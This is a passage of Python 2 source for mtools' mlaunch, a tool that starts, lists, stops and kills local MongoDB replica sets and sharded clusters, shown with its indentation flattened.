queue.put_nowait((port, False))
return False
try:
# make connection and ping host
con = MongoConnection(host)
con.admin.command('ping')
if to_start:
if queue:
queue.put_nowait((port, True))
return True
else:
time.sleep(interval)
except Exception as e:
if to_start:
time.sleep(interval)
else:
if queue:
queue.put_nowait((port, True))
return True
def shutdown_host(port, username=None, password=None, authdb=None):
""" send the shutdown command to a mongod or mongos on given port. This function can be called as a separate thread. """
host = 'localhost:%i'%port
try:
mc = MongoConnection(host)
try:
if username and password and authdb:
if authdb != "admin":
raise RuntimeError("given username/password is not for admin database")
else:
try:
mc.admin.authenticate(name=username, password=password)
except OperationFailure:
# perhaps auth is not required
pass
mc.admin.command('shutdown', force=True)
except AutoReconnect:
pass
except OperationFailure:
print "Error: cannot authenticate to shut down %s." % host
return
except ConnectionFailure:
pass
else:
mc.close()
class MLaunchTool(BaseCmdLineTool):
def __init__(self):
BaseCmdLineTool.__init__(self)
# arguments
self.args = None
# startup parameters for each port
self.startup_info = {}
# data structures for the discovery feature
self.cluster_tree = {}
self.cluster_tags = defaultdict(list)
self.cluster_running = {}
# config docs for replica sets (key is replica set name)
self.config_docs = {}
# shard connection strings
self.shard_connection_str = []
def run(self, arguments=None):
""" This is the main run method, called for all sub-commands and parameters.
It sets up argument parsing, then calls the sub-command method with the same name.
"""
# set up argument parsing in run, so that subsequent calls to run can call different sub-commands
self.argparser = argparse.ArgumentParser()
self.argparser.add_argument('--version', action='version', version="mtools version %s" % __version__)
self.argparser.add_argument('--no-progressbar', action='store_true', default=False, help='disables progress bar')
self.argparser.description = 'script to launch MongoDB stand-alone servers, replica sets and shards.'
# make sure init is default command even when specifying arguments directly
if arguments and arguments.startswith('-'):
arguments = 'init ' + arguments
# default sub-command is `init` if none provided
elif len(sys.argv) > 1 and sys.argv[1].startswith('-') and sys.argv[1] not in ['-h', '--help', '--version']:
sys.argv = sys.argv[0:1] + ['init'] + sys.argv[1:]
# create command sub-parsers
subparsers = self.argparser.add_subparsers(dest='command')
self.argparser._action_groups[0].title = 'commands'
self.argparser._action_groups[0].description = 'init is the default command and can be omitted. To get help on individual commands, run mlaunch <command> --help'
# init command
init_parser = subparsers.add_parser('init', help='initialize a new MongoDB environment and start stand-alone instances, replica sets, or sharded clusters.',
description='initialize a new MongoDB environment and start stand-alone instances, replica sets, or sharded clusters')
# either single or replica set
me_group = init_parser.add_mutually_exclusive_group(required=True)
me_group.add_argument('--single', action='store_true', help='creates a single stand-alone mongod instance')
me_group.add_argument('--replicaset', action='store_true', help='creates replica set with several mongod instances')
# replica set arguments
init_parser.add_argument('--nodes', action='store', metavar='NUM', type=int, default=3, help='adds NUM data nodes to replica set (requires --replicaset, default=3)')
init_parser.add_argument('--arbiter', action='store_true', default=False, help='adds arbiter to replica set (requires --replicaset)')
init_parser.add_argument('--name', action='store', metavar='NAME', default='replset', help='name for replica set (default=replset)')
init_parser.add_argument('--priority', action='store_true', default=False, help='make lowest-port member primary')
# sharded clusters
init_parser.add_argument('--sharded', '--shards', action='store', nargs='+', metavar='N', help='creates a sharded setup consisting of several singles or replica sets. Provide either list of shard names or number of shards.')
init_parser.add_argument('--config', action='store', default=-1, type=int, metavar='NUM', help='adds NUM config servers to sharded setup (requires --sharded, default=1, with --csrs default=3)')
init_parser.add_argument('--csrs', default=False, action='store_true', help='deploy config servers as a replica set (requires MongoDB >= 3.2.0)')
init_parser.add_argument('--mongos', action='store', default=1, type=int, metavar='NUM', help='starts NUM mongos processes (requires --sharded, default=1)')
# verbose, port, binary path
init_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
init_parser.add_argument('--port', action='store', type=int, default=27017, help='port for mongod, start of port range in case of replica set or shards (default=27017)')
init_parser.add_argument('--binarypath', action='store', default=None, metavar='PATH', help='search for mongod/s binaries in the specified PATH.')
init_parser.add_argument('--dir', action='store', default='./data', help='base directory to create db and log paths (default=./data/)')
init_parser.add_argument('--hostname', action='store', default=socket.gethostname(), help='override hostname for replica set configuration')
# authentication, users, roles
self._default_auth_roles = ['dbAdminAnyDatabase', 'readWriteAnyDatabase', 'userAdminAnyDatabase', 'clusterAdmin']
init_parser.add_argument('--auth', action='store_true', default=False, help='enable authentication and create a key file and admin user (default=user/password)')
init_parser.add_argument('--username', action='store', type=str, default='user', help='username to add (requires --auth, default=user)')
init_parser.add_argument('--password', action='store', type=str, default='password', help='password for given username (requires --auth, default=password)')
init_parser.add_argument('--auth-db', action='store', type=str, default='admin', metavar='DB', help='database where user will be added (requires --auth, default=admin)')
init_parser.add_argument('--auth-roles', action='store', default=self._default_auth_roles, metavar='ROLE', nargs='*', help='admin user''s privilege roles; note that the clusterAdmin role is required to run the stop command (requires --auth, default="%s")' % ' '.join(self._default_auth_roles))
# start command
start_parser = subparsers.add_parser('start', help='starts existing MongoDB instances. Example: "mlaunch start config" will start all config servers.',
description='starts existing MongoDB instances. Example: "mlaunch start config" will start all config servers.')
start_parser.add_argument('tags', metavar='TAG', action='store', nargs='*', default=[], help='without tags, all non-running nodes will be restarted. Provide additional tags to narrow down the set of nodes to start.')
start_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
start_parser.add_argument('--dir', action='store', default='./data', help='base directory to start nodes (default=./data/)')
start_parser.add_argument('--binarypath', action='store', default=None, metavar='PATH', help='search for mongod/s binaries in the specified PATH.')
# stop command
stop_parser = subparsers.add_parser('stop', help='stops running MongoDB instances. Example: "mlaunch stop shard 2 secondary" will stop all secondary nodes of shard 2.',
description='stops running MongoDB instances with the shutdown command. Example: "mlaunch stop shard 2 secondary" will stop all secondary nodes of shard 2.')
stop_parser.add_argument('tags', metavar='TAG', action='store', nargs='*', default=[], help='without tags, all running nodes will be stopped. Provide additional tags to narrow down the set of nodes to stop.')
stop_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
stop_parser.add_argument('--dir', action='store', default='./data', help='base directory to stop nodes (default=./data/)')
# restart command
restart_parser = subparsers.add_parser('restart', help='stops, then restarts MongoDB instances.',
description='stops running MongoDB instances with the shutdown command. Then restarts the stopped instances.')
restart_parser.add_argument('tags', metavar='TAG', action='store', nargs='*', default=[], help='without tags, all non-running nodes will be restarted. Provide additional tags to narrow down the set of nodes to start.')
restart_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
restart_parser.add_argument('--dir', action='store', default='./data', help='base directory to restart nodes (default=./data/)')
restart_parser.add_argument('--binarypath', action='store', default=None, metavar='PATH', help='search for mongod/s binaries in the specified PATH.')
# list command
list_parser = subparsers.add_parser('list', help='list MongoDB instances of this environment.',
description='list MongoDB instances of this environment.')
list_parser.add_argument('--dir', action='store', default='./data', help='base directory to list nodes (default=./data/)')
list_parser.add_argument('--tags', action='store_true', default=False, help='outputs the tags for each instance. Tags can be used to target instances for start/stop/kill.')
list_parser.add_argument('--startup', action='store_true', default=False, help='outputs the startup command lines for each instance.')
list_parser.add_argument('--verbose', action='store_true', default=False, help='alias for --tags.')
# list command
kill_parser = subparsers.add_parser('kill', help='kills (or sends another signal to) MongoDB instances of this environment.',
description='kills (or sends another signal to) MongoDB instances of this environment.')
kill_parser.add_argument('tags', metavar='TAG', action='store', nargs='*', default=[], help='without tags, all running nodes will be killed. Provide additional tags to narrow down the set of nodes to kill.')
kill_parser.add_argument('--dir', action='store', default='./data', help='base directory to kill nodes (default=./data/)')
kill_parser.add_argument('--signal', action='store', default=15, help='signal to send to processes, default=15 (SIGTERM)')
kill_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
# argparser is set up, now call base class run()
BaseCmdLineTool.run(self, arguments, get_unknowns=True)
# conditions on argument combinations
if self.args['command'] == 'init' and 'single' in self.args and self.args['single']:
if self.args['arbiter']:
self.argparser.error("can't specify --arbiter for single nodes.")
# replace path with absolute path, but store relative path as well
self.relative_dir = self.args['dir']
self.dir = os.path.abspath(self.args['dir'])
self.args['dir'] = self.dir
# branch out in sub-commands
getattr(self, self.args['command'])()
# -- below are the main commands: init, start, stop, list, kill
def init(self):
""" sub-command init. Branches out to sharded, replicaset or single node methods. """
# check for existing environment. Only allow subsequent 'mlaunch init' if they are identical.
if self._load_parameters():
if self.loaded_args != self.args:
raise SystemExit('A different environment already exists at %s.' % self.dir)
first_init = False
else:
first_init = True
# number of default config servers
if self.args['config'] == -1:
self.args['config'] = 1
# Check if config replicaset is applicable to this version
current_version = self.getMongoDVersion()
# Exit with error if --csrs is set and MongoDB < 3.1.0
if self.args['csrs'] and LooseVersion(current_version) < LooseVersion("3.1.0"):
errmsg = " \n * The '--csrs' option requires MongoDB version 3.2.0 or greater, the current version is %s.\n" % current_version
raise SystemExit(errmsg)
# add the 'csrs' parameter as default for MongoDB >= 3.3.0
if LooseVersion(current_version) >= LooseVersion("3.3.0"):
self.args['csrs'] = True
# check if authentication is enabled, make key file
if self.args['auth'] and first_init:
if not os.path.exists(self.dir):
os.makedirs(self.dir)
os.system('openssl rand -base64 753 > %s/keyfile'%self.dir)
os.system('chmod 600 %s/keyfile'%self.dir)
# construct startup strings
self._construct_cmdlines()
# if not all ports are free, complain and suggest alternatives.
all_ports = self.get_tagged(['all'])
ports_avail = self.wait_for(all_ports, 1, 1, to_start=False)
if not all(map(itemgetter(1), ports_avail)):
dir_addon = ' --dir %s'%self.relative_dir if self.relative_dir != './data' else ''
errmsg = '\nThe following ports are not available: %s\n\n' % ', '.join( [ str(p[0]) for p in ports_avail if not p[1] ] )
errmsg += " * If you want to restart nodes from this environment, use 'mlaunch start%s' instead.\n" % dir_addon
errmsg += " * If the ports are used by a different mlaunch environment, stop those first with 'mlaunch stop --dir <env>'.\n"
errmsg += " * You can also specify a different port range with an additional '--port <startport>'\n"
raise SystemExit(errmsg)
if self.args['sharded']:
shard_names = self._get_shard_names(self.args)
# start mongod (shard and config) nodes and wait
nodes = self.get_tagged(['mongod', 'down'])
self._start_on_ports(nodes, wait=True, overrideAuth=True)
# initiate replica sets if init is called for the first time
if first_init:
if self.args['csrs']:
# Initiate config servers in a replicaset
if self.args['verbose']:
print 'Initiating config server replica set.'
members = sorted(self.get_tagged(["config"]))
self._initiate_replset(members[0], "configRepl")
for shard in shard_names:
# initiate replica set on first member
if self.args['verbose']:
print 'Initiating shard replica set %s.' % shard
members = sorted(self.get_tagged([shard]))
self._initiate_replset(members[0], shard)
# add mongos
mongos = sorted(self.get_tagged(['mongos', 'down']))
self._start_on_ports(mongos, wait=True, overrideAuth=True)
if first_init:
# add shards
mongos = sorted(self.get_tagged(['mongos']))
con = MongoConnection('localhost:%i'%mongos[0])
shards_to_add = len(self.shard_connection_str)
nshards = con['config']['shards'].count()
if nshards < shards_to_add:
if self.args['replicaset']:
print "adding shards. can take up to 30 seconds..."
else:
print "adding shards."
shard_conns_and_names = zip(self.shard_connection_str, shard_names)
while True:
try:
nshards = con['config']['shards'].count()
except:
nshards = 0
if nshards >= shards_to_add:
break
for conn_str, name in shard_conns_and_names:
try:
res = con['admin'].command( SON([('addShard', conn_str), ('name', name)]) )
except Exception as e:
if self.args['verbose']:
print e, ', will retry in a moment.'
continue
if res['ok']:
if self.args['verbose']:
print "shard %s added successfully"%conn_str
shard_conns_and_names.remove( (conn_str, name) )
break
else:
if self.args['verbose']:
print res, '- will retry'
time.sleep(1)
elif self.args['single']:
# just start node
nodes = self.get_tagged(['single', 'down'])
self._start_on_ports(nodes, wait=False)
elif self.args['replicaset']:
# start nodes and wait
nodes = sorted(self.get_tagged(['mongod', 'down']))
self._start_on_ports(nodes, wait=True)
# initiate replica set
if first_init:
self._initiate_replset(nodes[0], self.args['name'])
# wait for all nodes to be running
nodes = self.get_tagged(['all'])
self.wait_for(nodes)
# now that nodes are running, add admin user if authentication enabled
if self.args['auth'] and first_init:
self.discover()
nodes = []
if self.args['sharded']:
nodes = self.get_tagged(['mongos', 'running'])
elif self.args['single']:
nodes = self.get_tagged(['single', 'running'])
elif self.args['replicaset']:
print "waiting for primary to add a user."
if self._wait_for_primary():
nodes = self.get_tagged(['primary', 'running'])
else:
raise RuntimeError("failed to find a primary, so adding admin user isn't possible")
if not nodes:
raise RuntimeError("can't connect to server, so adding admin user isn't possible")
if "clusterAdmin" not in self.args['auth_roles']:
warnings.warn("the stop command will not work with auth because the user does not have the clusterAdmin role")
self._add_user(sorted(nodes)[0], name=self.args['username'], password=self.args['password'],
database=self.args['auth_db'], roles=self.args['auth_roles'])
if self.args['verbose']:
print "added user %s on %s database" % (self.args['username'], self.args['auth_db'])
# in sharded env, if --mongos 0, kill the dummy mongos
if self.args['sharded'] and self.args['mongos'] == 0:
port = self.args['port']
print "shutting down temporary mongos on localhost:%s" % port
username = self.args['username'] if self.args['auth'] else None
password = self.args['password'] if self.args['auth'] else None
authdb = self.args['auth_db'] if self.args['auth'] else None
shutdown_host(port, username, password, authdb)
# write out parameters
if self.args['verbose']:
print "writing .mlaunch_startup file."
self._store_parameters()
# discover again, to get up-to-date info
self.discover()
# for sharded authenticated clusters, restart after first_init to enable auth
if self.args['sharded'] and self.args['auth'] and first_init:
if self.args['verbose']:
print "restarting cluster to enable auth..."
self.restart()
if self.args['auth']:
print 'Username "%s", password "%s"' % (
self.args['username'], self.args['password'])
if self.args['verbose']:
print "done."
# Get the "mongod" version, useful for checking for support or non-support of features
# Normally we expect to get back something like "db version v3.4.0", but with release candidates
# we get abck something like "db version v3.4.0-rc2". This code exact the "major.minor.revision"
# part of the string
def getMongoDVersion(self):
binary = "mongod"
if self.args and self.args['binarypath']:
binary = os.path.join(self.args['binarypath'], binary)
ret = subprocess.Popen(['%s --version' % binary], stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
out, err = ret.communicate()
buf = StringIO(out)
current_version = buf.readline().rstrip('\n')
# remove prefix "db version v"
if current_version.rindex('v') > 0:
current_version = current_version.rpartition('v')[2]
# remove suffix making assumption that all release candidates equal revision 0
try:
if current_version.rindex('-') > 0: # release candidate?
current_version = current_version.rpartition('-')[0]
except Exception:
pass
if self.args['verbose']:
print "Detected mongod version: %s" % current_version
return current_version
def stop(self):
""" sub-command stop. This method will parse the list of tags and stop the matching nodes.
Each tag has a set of nodes associated with it, and only the nodes matching all tags (intersection)
will be shut down.
Currently this is an alias for kill()
"""
self.kill()
def start(self):
""" sub-command start. """
self.discover()
# startup_info only gets loaded from protocol version 2 on, check if it's loaded
if not self.startup_info:
# hack to make environment startable with older protocol versions < 2: try to start nodes via init if all nodes are down
if len(self.get_tagged(['down'])) == len(self.get_tagged(['all'])):
self.args = self.loaded_args
print "upgrading mlaunch environment meta-data."
return self.init()
else:
raise SystemExit("These nodes were created with an older version of mlaunch (v1.1.1 or below). To upgrade this environment and make use of the start/stop/list commands, stop all nodes manually, then run 'mlaunch start' again. You only have to do this once.")
# if new unknown_args are present, compare them with loaded ones (here we can be certain of protocol v2+)
if self.args['binarypath'] != None or (self.unknown_args and set(self.unknown_args) != set(self.loaded_unknown_args)):
# store current args, use self.args from the file (self.loaded_args)
start_args = self.args
self.args = self.loaded_args
self.args['binarypath'] = start_args['binarypath']
# construct new startup strings with updated unknown args. They are for this start only and
# will not be persisted in the .mlaunch_startup file
self._construct_cmdlines()
# reset to original args for this start command
self.args = start_args
matches = self._get_ports_from_args(self.args, 'down')
if len(matches) == 0:
raise SystemExit('no nodes started.')
# start config servers first
config_matches = self.get_tagged(['config']).intersection(matches)
self._start_on_ports(config_matches, wait=True)
# start shards next
mongod_matches = self.get_tagged(['mongod']) - self.get_tagged(['config'])
mongod_matches = mongod_matches.intersection(matches)
self._start_on_ports(mongod_matches, wait=True)
# now start mongos
mongos_matches = self.get_tagged(['mongos']).intersection(matches)
self._start_on_ports(mongos_matches)
# wait for all matched nodes to be running
self.wait_for(matches)
# refresh discover
self.discover()
def list(self):
""" sub-command list. Takes no further parameters. Will discover the current configuration and
print a table of all the nodes with status and port.
"""
self.discover()
print_docs = []
# mongos
for node in sorted(self.get_tagged(['mongos'])):
doc = OrderedDict([ ('process','mongos'), ('port',node), ('status','running' if self.cluster_running[node] else 'down') ])
print_docs.append( doc )
if len(self.get_tagged(['mongos'])) > 0:
print_docs.append( None )
# configs
for node in sorted(self.get_tagged(['config'])):
doc = OrderedDict([ ('process','config server'), ('port',node), ('status','running' if self.cluster_running[node] else 'down') ])
print_docs.append( doc )
if len(self.get_tagged(['config'])) > 0:
print_docs.append( None )
# mongod
for shard in self._get_shard_names(self.loaded_args):
tags = []
replicaset = 'replicaset' in self.loaded_args and self.loaded_args['replicaset']
padding = ''
if shard:
print_docs.append(shard)
tags.append(shard)
padding = ' '
if replicaset:
# primary
primary = self.get_tagged(tags + ['primary', 'running'])
if len(primary) > 0:
node = list(primary)[0]
print_docs.append( OrderedDict([ ('process', padding+'primary'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
# secondaries
secondaries = self.get_tagged(tags + ['secondary', 'running'])
for node in sorted(secondaries):
print_docs.append( OrderedDict([ ('process', padding+'secondary'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
# data-bearing nodes that are down or not in the replica set yet
mongods = self.get_tagged(tags + ['mongod'])
arbiters = self.get_tagged(tags + ['arbiter'])
nodes = sorted(mongods - primary - secondaries - arbiters)
for node in nodes:
print_docs.append( OrderedDict([ ('process', padding+'mongod'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
# arbiters
for node in arbiters:
print_docs.append( OrderedDict([ ('process', padding+'arbiter'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
else:
nodes = self.get_tagged(tags + ['mongod'])
if len(nodes) > 0:
node = nodes.pop()
print_docs.append( OrderedDict([ ('process', padding+'single'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
if shard:
print_docs.append(None)
processes = self._get_processes()
startup = self.startup_info
# print tags as well
for doc in filter(lambda x: type(x) == OrderedDict, print_docs):
try:
doc['pid'] = processes[doc['port']].pid
except KeyError:
doc['pid'] = '-'
if self.args['verbose'] or self.args['tags']:
tags = self.get_tags_of_port(doc['port'])
doc['tags'] = ', '.join(tags)
if self.args['startup']:
try:
# first try running process (startup may be modified via start command)
doc['startup command'] = ' '.join(processes[doc['port']].cmdline())
except KeyError:
# if not running, use stored startup_info
doc['startup command'] = startup[str(doc['port'])]
print_docs.append( None )
print
print_table(print_docs)
if self.loaded_args.get('auth'):
print('\tauth: "%s:%s"' % (self.loaded_args.get('username'),
self.loaded_args.get('password')))
def kill(self):
self.discover()
# get matching tags, can only send signals to running nodes
matches = self._get_ports_from_args(self.args, 'running')
processes = self._get_processes()
# convert signal to int, default is SIGTERM for graceful shutdown
sig = self.args.get('signal') or 'SIGTERM'
if type(sig) == int:
pass
elif isinstance(sig, str):
try:
sig = int(sig)
except ValueError as e:
try:
sig = getattr(signal, sig)
except AttributeError as e:
raise SystemExit("can't parse signal '%s', use integer or signal name (SIGxxx)." % sig)
for port in processes:
# only send signal to matching processes
if port in matches:
p = processes[port]
p.send_signal(sig)
if self.args['verbose']:
print " %s on port %i, pid=%i" % (p.name, port, p.pid)
print "sent signal %s to %i process%s." % (sig, len(matches), '' if len(matches) == 1 else 'es')
# there is a very brief period in which nodes are not reachable anymore, but the
# port is not torn down fully yet and an immediate start command would fail. This
# very short sleep prevents that case, and it is practically not noticable by users
time.sleep(0.1)
# refresh discover
self.discover()
def restart(self):
# get all running processes
processes = self._get_processes()
procs = [processes[k] for k in processes.keys()]
# stop nodes via stop command
self.stop()
# wait until all processes terminate
psutil.wait_procs(procs)
# start nodes again via start command
self.start()
# --- below are api helper methods, can be called after creating an MLaunchTool() object
def discover(self):
""" This method will go out to each of the processes and get their state. It builds the
self.cluster_tree, self.cluster_tags, self.cluster_running data structures, needed
for sub-commands start, stop, list.
"""
# need self.args['command'] so fail if it's not available
if not self.args or not 'command' in self.args or not self.args['command']:
return
# load .mlaunch_startup file for start, stop, list, use current parameters for init
if self.args['command'] == 'init':
self.loaded_args, self.loaded_unknown_args = self.args, self.unknown_args
else:
if not self._load_parameters():
raise SystemExit("can't read %s/.mlaunch_startup, use 'mlaunch init ...' first." % self.dir)
# reset cluster_* variables
self.cluster_tree = {}
self.cluster_tags = defaultdict(list)
self.cluster_running = {}
# get shard names
shard_names = self._get_shard_names(self.loaded_args)
# some shortcut variables
is_sharded = 'sharded' in self.loaded_args and self.loaded_args['sharded'] != None
is_replicaset = 'replicaset' in self.loaded_args and self.loaded_args['replicaset']
is_csrs = 'csrs' in self.loaded_args and self.loaded_args['csrs']
is_single = 'single' in self.loaded_args and self.loaded_args['single']
has_arbiter = 'arbiter' in self.loaded_args and self.loaded_args['arbiter']
# determine number of nodes to inspect
if is_sharded:
num_config = self.loaded_args['config']
# at least one temp. mongos for adding shards, will be killed later on
num_mongos = max(1, self.loaded_args['mongos'])
num_shards = len(shard_names)
else:
num_shards = 1
num_config = 0
num_mongos = 0
num_nodes_per_shard = self.loaded_args['nodes'] if is_replicaset else 1
if has_arbiter:
num_nodes_per_shard += 1
num_nodes = num_shards * num_nodes_per_shard + num_config + num_mongos
current_port = self.loaded_args['port']
# tag all nodes with 'all'
self.cluster_tags['all'].extend ( range(current_port, current_port + num_nodes) )
# tag all nodes with their port number (as string) and whether they are running
for port in range(current_port, current_port + num_nodes):
self.cluster_tags[str(port)].append(port)
running = self.is_running(port)
self.cluster_running[port] = running
self.cluster_tags['running' if running else 'down'].append(port)
# find all mongos
for i in range(num_mongos):
port = i+current_port
# add mongos to cluster tree
self.cluster_tree.setdefault( 'mongos', [] ).append( port )
# add mongos to tags
self.cluster_tags['mongos'].append( port )
current_port += num_mongos
# find all mongods (sharded, replicaset or single)
if shard_names == None:
shard_names = [ None ]
for shard in shard_names:
port_range = range(current_port, current_port + num_nodes_per_shard)
# all of these are mongod nodes
self.cluster_tags['mongod'].extend( port_range )
if shard:
# if this is a shard, store in cluster_tree and tag shard name
self.cluster_tree.setdefault( 'shard', [] ).append( port_range )
self.cluster_tags[shard].extend( port_range )
if is_replicaset:
# get replica set states
rs_name = shard if shard else self.loaded_args['name']
try:
mrsc = Connection( ','.join( 'localhost:%i'%i for i in port_range ), replicaSet=rs_name )
# primary, secondaries, arbiters
# @todo: this is no longer working because MongoClient is now non-blocking
if mrsc.primary:
self.cluster_tags['primary'].append( mrsc.primary[1] )
self.cluster_tags['secondary'].extend( map(itemgetter(1), mrsc.secondaries) )
self.cluster_tags['arbiter'].extend( map(itemgetter(1), mrsc.arbiters) )
# secondaries in cluster_tree (order is now important)
self.cluster_tree.setdefault( 'secondary', [] )
for i, secondary in enumerate(sorted(map(itemgetter(1), mrsc.secondaries))):
if len(self.cluster_tree['secondary']) <= i:
self.cluster_tree['secondary'].append([])
self.cluster_tree['secondary'][i].append(secondary)
except (ConnectionFailure, ConfigurationError):
pass
elif is_single:
self.cluster_tags['single'].append( current_port )
# increase current_port
current_port += num_nodes_per_shard
# add config server to cluster tree
self.cluster_tree.setdefault( 'config', [] ).append( port )
# If not CSRS, set the number of config servers to be 1 or 3
# This is needed, otherwise `mlaunch init --sharded 2 --replicaset --config 2` on <3.3.0 will crash
if not self.args.get('csrs') and self.args['command'] == 'init':
if num_config >= 3:
num_config = 3
else:
num_config = 1
for i in range(num_config):
port = i+current_port
try:
mc = MongoConnection('localhost:%i'%port)
mc.admin.command('ping')
running = True
except ConnectionFailure:
# node not reachable
running = False
# add config server to cluster tree
self.cluster_tree.setdefault( 'config', [] ).append( port )
# add config server to tags
self.cluster_tags['config'].append( port )
self.cluster_tags['mongod'].append( port )
current_port += num_mongos
def is_running(self, port):
""" returns if a host on a specific port is running. """
try:
con = MongoConnection('localhost:%s' % port)
con.admin.command('ping')
return True
except (AutoReconnect, ConnectionFailure):
return False
def get_tagged(self, tags):
""" The format for the tags list is tuples for tags: mongos, config, shard, secondary tags
of the form (tag, number), e.g. ('mongos', 2) which references the second mongos
in the list. For all other tags, it is simply the string, e.g. 'primary'.
"""
# if tags is a simple string, make it a list (note: tuples like ('mongos', 2) must be in a surrounding list)
if not hasattr(tags, '__iter__') and type(tags) == str:
tags = [ tags ]
nodes = set(self.cluster_tags['all'])
for tag in tags:
if re.match(r"\w+ \d{1,2}", tag):
# special case for tuple tags: mongos, config, shard, secondary. These can contain a number
tag, number = tag.split()
try:
branch = self.cluster_tree[tag][int(number)-1]
except (IndexError, KeyError):
continue
if hasattr(branch, '__iter__'):
subset = set(branch)
else:
subset = set([branch])
else:
# otherwise use tags dict to get the subset
subset = set(self.cluster_tags[tag])
nodes = nodes.intersection(subset)
return nodes
def get_tags_of_port(self, port):
""" get all tags related to a given port (inverse of what is stored in self.cluster_tags) """
return sorted([tag for tag in self.cluster_tags if port in self.cluster_tags[tag] ])
def wait_for(self, ports, interval=1.0, timeout=30, to_start=True):
""" Given a list of ports, spawns up threads that will ping the host on each port concurrently.
Returns when all hosts are running (if to_start=True) / shut down (if to_start=False)
"""
threads = []
queue = Queue.Queue()
for port in ports:
threads.append(threading.Thread(target=wait_for_host, args=(port, interval, timeout, to_start, queue)))
if self.args and 'verbose' in self.args and self.args['verbose']:
print "waiting for nodes %s..." % ('to start' if to_start else 'to shutdown')
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# get all results back and return tuple
return tuple(queue.get_nowait() for _ in ports)
# --- below here are internal helper methods, should not be called externally ---
def _convert_u2b(self, obj):
""" helper method to convert unicode back to plain text. """
if isinstance(obj, dict):
return dict([(self._convert_u2b(key), self._convert_u2b(value)) for key, value in obj.iteritems()])
elif isinstance(obj, list):
return [self._convert_u2b(element) for element in obj]
elif isinstance(obj, unicode):
return obj.encode('utf-8')
else:
return obj
def _load_parameters(self):
""" tries to load the .mlaunch_startup file that exists in each datadir.
Handles different protocol versions.
"""
datapath = self.dir
startup_file = os.path.join(datapath, '.mlaunch_startup')
if not os.path.exists(startup_file):
return False
in_dict = self._convert_u2b(json.load(open(startup_file, 'r')))
# handle legacy version without versioned protocol
if 'protocol_version' not in in_dict:
in_dict['protocol_version'] = 1
self.loaded_args = in_dict
self.startup_info = {}
# hostname was added recently
self.loaded_args['hostname'] = socket.gethostname()
elif in_dict['protocol_version'] == 2:
self.startup_info = in_dict['startup_info']
self.loaded_unknown_args = in_dict['unknown_args']
self.loaded_args = in_dict['parsed_args']
# changed 'authentication' to 'auth', if present (from old env) rename
if 'authentication' in self.loaded_args:
self.loaded_args['auth'] = self.loaded_args['authentication']
del self.loaded_args['authentication']
return True
def _store_parameters(self):
""" stores the startup parameters and config in the .mlaunch_startup file in the datadir. """
datapath = self.dir
out_dict = {
'protocol_version': 2,
'mtools_version': __version__,
'parsed_args': self.args,
'unknown_args': self.unknown_args,
'startup_info': self.startup_info
}
if not os.path.exists(datapath):
os.makedirs(datapath)
try:
json.dump(out_dict, open(os.path.join(datapath, '.mlaunch_startup'), 'w'), -1)
except Exception:
pass
def _create_paths(self, basedir, name=None):
""" create datadir and subdir paths. """
if name:
datapath = os.path.join(basedir, name)
else:
datapath = basedir
dbpath = os.path.join(datapath, 'db')
if not os.path.exists(dbpath):
os.makedirs(dbpath)
if self.args['verbose']:
print 'creating directory: %s'%dbpath
return datapath
def _get_ports_from_args(self, args, extra_tag):
tags = []
if 'tags' not in args:
args['tags'] = []
for tag1, tag2 in zip(args['tags'][:-1], args['tags'][1:]):
if re.match('^\d{1,2}$', tag1):
print "warning: ignoring numeric value '%s'" % tag1
continue
if re.match('^\d{1,2}$', tag2):
if tag1 in ['mongos', 'shard', 'secondary', 'config']:
# combine tag with number, separate by string
tags.append( '%s %s' % (tag1, tag2) )
continue
else:
print "warning: ignoring numeric value '%s' after '%s'" % (tag2, tag1)
tags.append( tag1 )
if len(args['tags']) > 0:
tag = args['tags'][-1]
if not re.match('^\d{1,2}$', tag):
tags.append(tag)
tags.append(extra_tag)
matches = self.get_tagged(tags)
return matches
def _filter_valid_arguments(self, arguments, binary="mongod", config=False):
""" check which of the list of arguments is accepted by the specified binary (mongod, mongos).
returns a list of accepted arguments. If an argument does not start with '-' but its preceding
argument was accepted, then it is accepted as well. Example ['--slowms', '1000'] both arguments
would be accepted for a mongod.
"""
if self.args and self.args['binarypath']:
binary = os.path.join( self.args['binarypath'], binary)
# get the help list of the binary
ret = subprocess.Popen(['%s --help'%binary], stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
out, err = ret.communicate()
accepted_arguments = []
# extract all arguments starting with a '-'
for line in [option for option in out.split('\n')]:
line = line.lstrip()
if line.startswith('-'):
argument = line.split()[0]
# exception: don't allow unsupported config server arguments
if config and argument in ['--oplogSize', '--storageEngine', '--smallfiles', '--nojournal']:
continue
accepted_arguments.append(argument)
# add undocumented options
accepted_arguments.append('--setParameter')
if binary == "mongod":
accepted_arguments.append('--wiredTigerEngineConfigString')
# filter valid arguments
result = []
for i, arg in enumerate(arguments):
if arg.startswith('-'):
# check if the binary accepts this argument or special case -vvv for any number of v
if arg in accepted_arguments or re.match(r'-v+', arg):
result.append(arg)
elif i > 0 and arguments[i-1] in result:
# if it doesn't start with a '-', it could be the value of the last argument, e.g. `--slowms 1000`
result.append(arg)
# return valid arguments as joined string
return ' '.join(result)
def _get_shard_names(self, args):
""" get the shard names based on the self.args['sharded'] parameter. If it's a number, create
shard names of type shard##, where ## is a 2-digit number. Returns a list [ None ] if
no shards are present.
"""
if 'sharded' in args and args['sharded']:
if len(args['sharded']) == 1:
try:
# --sharded was a number, name shards shard01, shard02, ... (only works with replica sets)
n_shards = int(args['sharded'][0])
shard_names = ['shard%.2i'%(i+1) for i in range(n_shards)]
except ValueError, e:
# --sharded was a string, use it as name for the one shard
shard_names = args['sharded']
else:
shard_names = args['sharded']
else:
shard_names = [ None ]
return shard_names
def _start_on_ports(self, ports, wait=False, overrideAuth=False):
threads = []
if overrideAuth and self.args['verbose']:
